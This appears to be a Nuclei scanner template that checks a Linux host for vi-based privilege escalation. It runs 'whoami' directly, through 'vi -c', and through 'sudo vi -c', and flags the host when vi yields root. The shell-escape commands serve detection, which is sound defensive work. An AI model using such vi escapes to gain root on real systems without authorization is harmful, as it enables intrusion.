id: privesc-vi

info:
  name: Vi - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    vi is a classic text editor in Unix and Unix-like operating systems. It is known for its modal editing capabilities and is often used for editing configuration files, scripts, and other text-based content in a terminal environment.
  reference:
    - https://gtfobins.github.io/gtfobins/vi/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,vi,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      vi -c '!whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo vi -c '!whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 490a0046304402203b4c6367774f4a6a195f7a1d884128f82a9a56209babeda7f9e3dd7d86b17a840220610ff4b54867dd54875c5830709819f89b5ac947821bf90200b49c561e1fd260:922c64590222798bb761d5b6d8e72950